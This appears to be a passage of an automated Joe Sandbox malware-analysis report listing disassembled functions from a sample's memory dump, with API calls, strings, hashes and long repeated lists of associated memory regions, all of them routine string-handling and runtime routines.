                                      • Associated: 00000000.00000002.2693911043.000000000040C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000417000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000458000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.000000000045F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000466000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.000000000047E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000485000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000498000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.00000000004A4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.00000000004D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.00000000004F2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.000000000051A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.000000000052B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000533000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2694396727.0000000000535000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2694425266.0000000000537000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_2f0000_SecuriteInfo.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Xinvalid_argumentstd::_$memcpy
                                      • String ID: string too long
                                      • API String ID: 2304785028-2556327735
                                      • Opcode ID: 439fc195bd6a5df532355c0a59281537ddc1b8bb7a567f239d54fe76bd3872b8
                                      • Instruction ID: 65f4dbc06ddb17770c26cc175671d55dccac420e9938ded8f9431fc20fbe0196
                                      • Opcode Fuzzy Hash: 439fc195bd6a5df532355c0a59281537ddc1b8bb7a567f239d54fe76bd3872b8
                                      • Instruction Fuzzy Hash: 9131E9323246188BD7259E5CE880A7AF7EFEBA57A4B21093BF641C7641C761DC6087A4
                                      Function 003030F0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 94stringCOMMON
                                      Download Yara Rule
                                      APIs
                                      • lstrlen.KERNEL32(00000000), ref: 00303120
                                      • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 003031CD
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2693911043.00000000002F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true
                                      • Associated: 00000000.00000002.2693873375.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000320000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000324000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000328000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.000000000033E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000406000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.000000000040C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000417000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000458000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.000000000045F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000466000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.000000000047E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000485000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000498000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.00000000004A4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.00000000004D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.00000000004F2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.000000000051A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.000000000052B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000533000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2694396727.0000000000535000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2694425266.0000000000537000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_2f0000_SecuriteInfo.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: lstrlen
                                      • String ID: ERROR
                                      • API String ID: 1659193697-2861137601
                                      • Opcode ID: 909dc0947a1e70b16d239f696fbf4e1a7ec9eef890421d15c904b8119fd1c8ef
                                      • Instruction ID: 6de26b205a575b1f6bd0b9512caa8c5a3752471e8e63d642ba6c298df007aa86
                                      • Opcode Fuzzy Hash: 909dc0947a1e70b16d239f696fbf4e1a7ec9eef890421d15c904b8119fd1c8ef
                                      • Instruction Fuzzy Hash: BA31C371910208ABCB00FF64DD46BAEBB78EF54790F048138F51697381DB349615CBD5
                                      Function 002FD7F0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 76COMMON
                                      Download Yara Rule
                                      APIs
                                      • std::_Xinvalid_argument.LIBCPMT ref: 002FD80B
                                        • Part of subcall function 0030F693: std::exception::exception.LIBCMT ref: 0030F6A8
                                        • Part of subcall function 0030F693: __CxxThrowException@8.LIBCMT ref: 0030F6BD
                                        • Part of subcall function 0030F693: std::exception::exception.LIBCMT ref: 0030F6CE
                                      • std::_Xinvalid_argument.LIBCPMT ref: 002FD822
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2693911043.00000000002F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true
                                      • Associated: 00000000.00000002.2693873375.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000320000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000324000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000328000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.000000000033E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000406000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.000000000040C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000417000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000458000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.000000000045F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000466000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.000000000047E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000485000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000498000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.00000000004A4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.00000000004D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.00000000004F2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.000000000051A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.000000000052B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000533000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2694396727.0000000000535000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2694425266.0000000000537000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_2f0000_SecuriteInfo.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Xinvalid_argumentstd::_std::exception::exception$Exception@8Throw
                                      • String ID: string too long
                                      • API String ID: 963545896-2556327735
                                      • Opcode ID: e329b62ff309e3f957f99604beca69cfa73265dbc4d7bf72ddaf64a5da69406f
                                      • Instruction ID: 86457465533c3e3dc6d15126778a18aafe8f03149d04e6ff3d5b997a23073251
                                      • Opcode Fuzzy Hash: e329b62ff309e3f957f99604beca69cfa73265dbc4d7bf72ddaf64a5da69406f
                                      • Instruction Fuzzy Hash: B111E4723146184BD331AD5CA880B7AF3EEEB957A0F10063FF6918B691C7A1985183A0
                                      Function 00300B80 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 71timeCOMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 002FF810: lstrcpy.KERNEL32(00000000,00000001), ref: 002FF839
                                      • GetSystemTime.KERNEL32(?,02F46C20,003101E9,?,00000000,?,?,?,?,?,002F46E7,?,00000014), ref: 00300BA9
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2693911043.00000000002F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true
                                      • Associated: 00000000.00000002.2693873375.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000320000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000324000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000328000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.000000000033E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000406000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.000000000040C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000417000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000458000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.000000000045F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000466000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.000000000047E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000485000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000498000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.00000000004A4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.00000000004D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.00000000004F2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.000000000051A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.000000000052B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000533000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2694396727.0000000000535000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2694425266.0000000000537000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_2f0000_SecuriteInfo.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: SystemTimelstrcpy
                                      • String ID: F/$F/
                                      • API String ID: 62757014-2085053079
                                      • Opcode ID: 66299f149e201045c61c0abe7c5e0aeb2f0bc9f2ad7495d097ec88f4319c519a
                                      • Instruction ID: 25efa54106da882151452874cb25d17e097265ed3fef3fb9aff669d0073e640f
                                      • Opcode Fuzzy Hash: 66299f149e201045c61c0abe7c5e0aeb2f0bc9f2ad7495d097ec88f4319c519a
                                      • Instruction Fuzzy Hash: DC1124716201086BC71DEF78DD919BEB7A8EF68300B00813DED05DB291EA78D915DB90
                                      Function 002FD4B0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 59COMMON
                                      Download Yara Rule
                                      APIs
                                      • std::_Xinvalid_argument.LIBCPMT ref: 002FD4C6
                                        • Part of subcall function 0030F6E0: std::exception::exception.LIBCMT ref: 0030F6F5
                                        • Part of subcall function 0030F6E0: __CxxThrowException@8.LIBCMT ref: 0030F70A
                                        • Part of subcall function 0030F6E0: std::exception::exception.LIBCMT ref: 0030F71B
                                      • memmove.MSVCRT(?,?,?), ref: 002FD4FF
                                      Strings
                                      • invalid string position, xrefs: 002FD4C1
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2693911043.00000000002F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true
                                      • Associated: 00000000.00000002.2693873375.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000320000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000324000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000328000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.000000000033E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000406000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.000000000040C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000417000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000458000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.000000000045F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000466000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.000000000047E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000485000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000498000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.00000000004A4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.00000000004D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.00000000004F2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.000000000051A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.000000000052B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000533000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2694396727.0000000000535000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2694425266.0000000000537000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_2f0000_SecuriteInfo.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: std::exception::exception$Exception@8ThrowXinvalid_argumentmemmovestd::_
                                      • String ID: invalid string position
                                      • API String ID: 1659287814-1799206989
                                      • Opcode ID: 9a74eec29dfe59f53376a35615c70281be4292f5270556b9bc16010e0bf9c945
                                      • Instruction ID: 15de0b003629b10cb601b6dafacaad86026be428857383e35fba93a10ad688e6
                                      • Opcode Fuzzy Hash: 9a74eec29dfe59f53376a35615c70281be4292f5270556b9bc16010e0bf9c945
                                      • Instruction Fuzzy Hash: 4701D6323102585BC3258EACEC80A7AF7ABEB94794B24493DE281CB741D6B1EC51C7A4